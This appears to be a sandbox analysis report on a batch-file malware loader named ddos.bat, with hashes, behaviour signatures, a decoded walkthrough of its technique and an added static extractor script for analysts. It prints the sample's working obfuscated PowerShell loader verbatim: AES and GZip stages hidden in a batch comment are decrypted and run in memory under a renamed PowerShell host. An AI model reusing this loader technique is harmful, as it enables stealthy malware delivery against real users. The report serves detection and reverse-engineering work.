Analysis
- max time kernel: 30s
- max time network: 33s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 19/04/2023, 12:48
Static task
- static1
Behavioral task behavioral1
- Sample: ddos.bat
- Resource: win7-20230220-en
Behavioral task behavioral2
- Sample: ddos.bat
- Resource: win10v2004-20230221-en
General
- Target: ddos.bat
- Size: 13.6MB
- MD5: c9a6186fbe27904439dc86cbb5b99b63
- SHA1: c0db0f28d1e9b501b9d4895c81afc75e13cb0774
- SHA256: 6ad553540149c82ab1ac85d37944e06ee9826c834c8388eb72cfd5f480525ceb
- SHA512: 65c1daaccb653427e01ba3e047465c443ca1b69dd644868f84ba50e86227039076f531208d3025d835660fe3230fbb3f114438a79183e6dc83dcdb935d96d185
- SSDEEP: 49152:D93mbEKzzOk10PbxBNOXT3mnDG6xlobNZ+hsoO0BrxYUpnkKILeAaco6s0Xy/Kcy:A
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  pid 528, process ddos.bat.exe
- Loads dropped DLL (1 IoC)
  pid 1204, process cmd.exe
- Enumerates physical storage devices (1 TTP)
  Sandbox description: "Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour." That is the generic text attached to this signature; nothing else in the report (no file encryption, no ransom note, no mass file writes) supports a ransomware label, so read it as drive enumeration by the loader, not as evidence of encryption.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 528, process ddos.bat.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  pid 528, process ddos.bat.exe, token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  pid 1204 (cmd.exe) wrote to the memory of pid 528 (ddos.bat.exe), procid_target 29; the report records the same event three times. This is the parent writing into the child it has just created, the usual pattern when cmd.exe starts a process, and on its own it is not evidence of injection into an unrelated process.
Processes
1. C:\Windows\system32\cmd.exe (PID 1204)
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory
2. C:\Users\Admin\AppData\Local\Temp\ddos.bat.exe (PID 528), child of 1204
   Command line (verbatim): "ddos.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function FpkiB($YdHmF){ $GvRDH=[System.Security.Cryptography.Aes]::Create(); $GvRDH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GvRDH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GvRDH.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yb/sQnv1LYw7DPhrH9M2+a0n2ERdGkY1aWnaG8wqSw4='); $GvRDH.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N56ByYz40xgwZvoDoOHriw=='); $msECO=$GvRDH.CreateDecryptor(); $return_var=$msECO.TransformFinalBlock($YdHmF, 0, $YdHmF.Length); $msECO.Dispose(); $GvRDH.Dispose(); $return_var;}function VAOuS($YdHmF){ $lunUV=New-Object System.IO.MemoryStream(,$YdHmF); $uJPUk=New-Object System.IO.MemoryStream; $GLVci=New-Object System.IO.Compression.GZipStream($lunUV, [IO.Compression.CompressionMode]::Decompress); $GLVci.CopyTo($uJPUk); $GLVci.Dispose(); $lunUV.Dispose(); $uJPUk.Dispose(); $uJPUk.ToArray();}function tZCne($YdHmF,$PVnCP){ $OStcp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YdHmF); $JGYEu=$OStcp.EntryPoint; $JGYEu.Invoke($null, $PVnCP);}$tUkTR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ddos.bat').Split([Environment]::NewLine);foreach ($kUNVs in $tUkTR) { if ($kUNVs.StartsWith(':: ')) { $hzQqb=$kUNVs.Substring(3); break; }}$FvIAX=[string[]]$hzQqb.Split('\');$qcDov=VAOuS (FpkiB ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FvIAX[0])));$Lxsns=VAOuS (FpkiB ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FvIAX[1])));tZCne $Lxsns (,[string[]] (''));tZCne $qcDov (,[string[]] (''));
   - Executes dropped EXE
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken

   What the command line shows. The switches (-noprofile, -windowstyle hidden, -ep bypass for -ExecutionPolicy Bypass, -command) are powershell.exe's, so ddos.bat.exe is a PowerShell host dropped under a misleading name; a renamed copy of powershell.exe is the usual arrangement for this kind of batch crypter, and the single 462KB file under Downloads is consistent with that, although the report does not name it. The script itself:
   - FpkiB: AES decryption, CBC mode, PKCS7 padding, with a hard-coded 32-byte key (base64 Yb/sQnv1LYw7DPhrH9M2+a0n2ERdGkY1aWnaG8wqSw4=) and 16-byte IV (base64 N56ByYz40xgwZvoDoOHriw==), i.e. AES-256-CBC with a static key.
   - VAOuS: GZip decompression of the decrypted bytes.
   - tZCne: [System.Reflection.Assembly]::Load on the byte array, then invokes the assembly's entry point with a single empty-string argument. The payload runs in memory inside PID 528 and is never written to disk, which is why it does not appear under Downloads.
   - Main body: reads ddos.bat itself with [System.IO.File]::ReadAllText, takes the first line that starts with ':: ' (a batch comment, so cmd.exe ignores it; that line carries the bulk of the 13.6MB file), splits it on '\' into two base64 blobs, decodes, decrypts and gunzips both, and loads the second blob ($Lxsns) before the first ($qcDov).
   Method names are hidden by reversing string literals at run time: 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL'[-1..-4] is Load, 'txeTllAdaeR'[-1..-11] is ReadAllText. This defeats naive string matching on the command line; match on the reversal idiom ([-1..-N] -join '') or on Assembly.Load of a byte array instead.
-
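The two payloads never leave process memory, so the practical next step is to recover them statically. The script below is an added example, not code from the sample or from the sandbox: it reuses the key, IV and container layout visible in the command line above, but writes the decrypted, decompressed stages to disk instead of calling Assembly.Load. The paths ($BatPath, $OutDir) and the output file names are assumptions.

```powershell
# Static extractor for the ddos.bat loader stages (added example, not the sample's own code).
# Assumes the sample is at $BatPath and that the payload line uses the same layout as the
# loader: first line starting with ':: ', '\'-separated base64, AES-256-CBC + GZip per blob.
param(
    [string]$BatPath = '.\ddos.bat',      # assumed location of the sample
    [string]$OutDir  = '.\ddos_stages'    # assumed output directory
)

# Key and IV exactly as they appear in the loader (base64). 32-byte key => AES-256.
$KeyB64 = 'Yb/sQnv1LYw7DPhrH9M2+a0n2ERdGkY1aWnaG8wqSw4='
$IvB64  = 'N56ByYz40xgwZvoDoOHriw=='

function Unprotect-Stage {
    param([byte[]]$Cipher)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [Convert]::FromBase64String($KeyB64)
    $aes.IV      = [Convert]::FromBase64String($IvB64)
    $dec = $aes.CreateDecryptor()
    try {
        # Leading comma returns the byte[] as one object instead of unrolling it on the pipeline.
        ,$dec.TransformFinalBlock($Cipher, 0, $Cipher.Length)
    } finally {
        $dec.Dispose(); $aes.Dispose()
    }
}

function Expand-Stage {
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try {
        $gz.CopyTo($out)
        ,$out.ToArray()
    } finally {
        $gz.Dispose(); $in.Dispose(); $out.Dispose()
    }
}

# The loader keys on the first line beginning with ':: ' (a batch comment, so cmd.exe skips it);
# the remainder of that line is the ciphertext container.
$batFull = (Resolve-Path -LiteralPath $BatPath).Path
$payloadLine = [System.IO.File]::ReadAllLines($batFull) |
    Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $payloadLine) { throw "no ':: ' payload line found in $batFull" }

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$outFull = (Resolve-Path -LiteralPath $OutDir).Path

$blobs = $payloadLine.Substring(3).Split('\')
for ($i = 0; $i -lt $blobs.Length; $i++) {
    $plain = Expand-Stage (Unprotect-Stage ([Convert]::FromBase64String($blobs[$i])))
    $path  = Join-Path $outFull ("stage{0}.bin" -f $i)
    [System.IO.File]::WriteAllBytes($path, $plain)
    # A .NET assembly starts with the DOS 'MZ' header; anything else deserves a closer look.
    $isPE = ($plain.Length -ge 2) -and ($plain[0] -eq 0x4D) -and ($plain[1] -eq 0x5A)
    $sha  = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash
    '{0}: {1} bytes, MZ header: {2}, SHA256 {3}' -f $path, $plain.Length, $isPE, $sha
}
```

Run it on an isolated analysis host; it only decrypts and writes files, and nothing in it executes the output. stage1.bin corresponds to $Lxsns, which the loader invokes first, and stage0.bin to $qcDov; feed both to a .NET decompiler next. If the key or IV in a new variant differs, only the two base64 constants change.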
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 462KB (one dropped file; the report lists it twice with identical hashes)
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d